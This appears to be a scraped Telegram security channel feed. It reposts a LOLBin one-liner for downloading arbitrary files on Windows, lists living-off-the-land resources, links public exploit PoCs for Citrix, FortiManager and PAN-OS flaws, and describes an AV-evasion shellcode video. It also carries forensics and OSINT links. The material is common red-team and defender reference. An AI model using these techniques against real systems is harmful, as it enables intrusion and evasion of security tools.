Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
Source Byte
Kanalga Telegram’da o‘tish
هشیار کسی باید کز عشق بپرهیزد وین طبع که من دارم با عقل نیامیزد Saadi Shirazi 187
Ko'proq ko'rsatish7 849
Obunachilar
+1024 soatlar
+467 kunlar
+18730 kunlar
Postlar arxiv
7 852
Repost from Source Byte
LOLBin for Downloading Arbitrary Files
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe <URL>
Find the downloaded file in
%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
#windows
#redteam
#lolbin
———
@islemolecule_source7 852
LOLOL
Living Off the Living Off the Land
https://br0k3nlab/lofp/
Living off the False Positive
an autogenerated collection of false positives sourced from some of the most popular rule sets. The information is categorized along with ATT&CK techniques, rule source, and data source.https://loldrivers.io Living Off The
Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attackshttps://gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systemshttps://lolbas-project.github.io
The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniqueshttps://lots-project.com
Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomainhttps://filesec.io
File extensions being used by attackershttps://hijacklibs.net
This project provides an curated list of DLL Hijacking candidateshttps://wadcoms.github.io
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environmentshttps://www.loobins.io
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposeshttps://lolapps-project.github.io
This project was made because exploitation isn’t limited to binaries using command line techniques. Both built-in and third-party applications have been used & abused for adversarial gain since the dawn of time, and knowing these methods can help when all else fail.https://www.bootloaders.io
Curated list of known malicious bootloaders for various operating systems. The project aims to assist security professionals in staying informed and mitigating potential threats associated with bootloaders BYOL Bring Your Own Land (BYOL)https://lothardware.com.tr
Living Off The Hardware is a resource collection that provides guidance on identifying and utilizing malicious hardware and malicious deviceshttps://wtfbins.wtf/
WTFBin is a binary that behaves exactly like malware, except, somehow, it’s nothttps://lofl-project.github.io
Living Off the Foreign Land (LOFL) are LOFL Cmdlets and Binaries (LOFLCABs) that are capable of performing activities from the local (Offensive Windows) system to a REMOTE system.https://persistence-info.github.io
This contains information about Windows persistence mechanisms to make the protection/detection more efficient.https://github.com/WithSecureLabs/lolcerts
Threat actors are known to sign their malware using stolen, or even legally acquired, code signing certificates. This project aims at collecting the details of the certificates that are known to be abused in the wild by malicious actors.https://boostsecurityio.github.io/lotp/
Inventory how development tools (typically CLIs), commonly used in CI/CD pipelines, have lesser-known RCE-By-Design features (“foot guns”), or more generally, can be used to achieve arbitrary code execution by running on untrusted code changes or following a workflow injection.https://lolbins-ctidriven.vercel.app/
This project that aims to help cyber defenders understand how LOLBin binaries are used by threat actors during an intrusion in a graphical and digestible format.https://lolesxi-project.github.io/LOLESXi/
This project features a comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilised in their operations.https://lolrmm.io/
This project is a curated list of Remote Monitoring and Management (RMM) tools that could potentially be abused by threat actors.#lolbins
7 852
🖨 Living Off The Land
- https://lolapps-project.github.io
- LOLAD
- UNIX binaries
- Windows binaries
- A collection of resources to thrive off the land
#lolbins
7 852
🖨 Living Off The Land
- https://lolapps-project.github.io
- LOLAD
- UNIX binaries
- Windows binaries
- A collection of resources to thrive off the land
7 852
Mimikatz
Mimikatz is an overall software tool used for process manipulation, primarily written in the C programming language by Mr. Benjamin Deply. This tool enables direct object manipulation and execution via various techniques. Mimikatz is widely used for bypassing security mechanisms, including EDR (Endpoint Detection and Response) software and antivirus tools. It has a number of features designed to assist with penetration testing and exploitation.https://github.com/gentilkiwi/mimikatz
7 852
Repost from APT IRAN مرکز تحقیقاتی
WatchTowr POCs:
CVE-2024-8068 & CVE-2024-8069 : Citrix Virtual Apps and Desktops (XEN) $versions - Unauthenticated Remote Code execution (Chain)
POC/AN : https://github.com/watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit
CVE-2024-47575 : Fortinet FortiManager 'Fgfmsd' $versions Unauthenticated Remote Code Execution (AKA FortiJump)
POC/AN : https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
CVE-2024-0012 & CVE-2024-9474 : PAN-OS $versions - Authentication Bypass LPE Root Command Injection (AKA Sslvpn _ Chain)
POC/AN : https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012/
@APTIRAN
7 852
Repost from OnHex
🔴 احتمالا شندید که میگن آنتی ویروسها از طریق یسری امضا (signatures) اقدام به شناسایی بدافزارها میکنن.
در این ویدیو از hoagie hacks دقیقا توضیح میده که منظور از امضاء چیه و آنتی ویروسهایی مانند Microsoft Defender چطوری از اونا برای شناسایی بدافزارها استفاده میکنن.
برای اینکه اینارو نشون بده، یدونه shellcode injection خیلی ساده در ++C پیاده سازی کرده و اومده امضاهایی که منجر به شناسایی بدافزار در Virus Total میشه رو شناسایی و حذف میکنه.
این ویدیوها قراره بصورت مجموعه ارائه بشه و در قسمتهای بعدی تکنیکهای string/API hashing و metamorphic/polymorphic code رو هم پیاده سازی میکنه.
هدف این ویدیوها، بهبود مهارتهای تیم قرمز و آشنایی و دفاع در تیم های آبی هستش.
#تیم_قرمز #تیم_آبی #آنتی_ویروس #توسعه_بدافزار
#redteam #Blueteam #MalwareDev #AV
🆔 @onhex_ir
➡️ ALL Link
7 852
How to Investigate Insider Threats (Forensic Methodology)
https://www.inversecos.com/2022/10/how-to-investigate-insider-threats.html
Find their #ttp
7 852
COM Object - Part 1
Confirm the concept of COM objects through practice and Check how to find a vulnerable COM object.
https://hackyboiz.github.io/2024/11/24/ogu123/COM_Object/
7 852
Cyber Threat Intelligence (CTI): A Clear Process for Data Ingestion and Distribution
https://medium.com/@philiphristoff/cyber-threat-intelligence-cti-a-clear-process-for-data-ingestion-and-distribution-1889f6a2c5a8
7 852
Take a look into the depths of Windows kernels and reveal more than 60000 undocumented structures https://www.vergiliusproject.com/
7 852
Repost from Cyber Detective
Wayback Machine collection search
twitter.com/BanPangar shared a method for finding emails/nicknames mentions in the text of web pages/docs with archive.org collection search. Help find a lot of things that don't show up in Google results.
Don't forget the quotes.
#osint
7 852
Repost from Go Casts 🚀
دنبال یه سری منبع در مورد golang internals بودم که با این repository آشنا شدم، به صورت موضوعی لینک های خوبی رو معرفی کرده، دوست داشتید بررسی کنید.
A collection of articles and videos to understand Golang internals.
https://github.com/emluque/golang-internals-resources
@gocasts
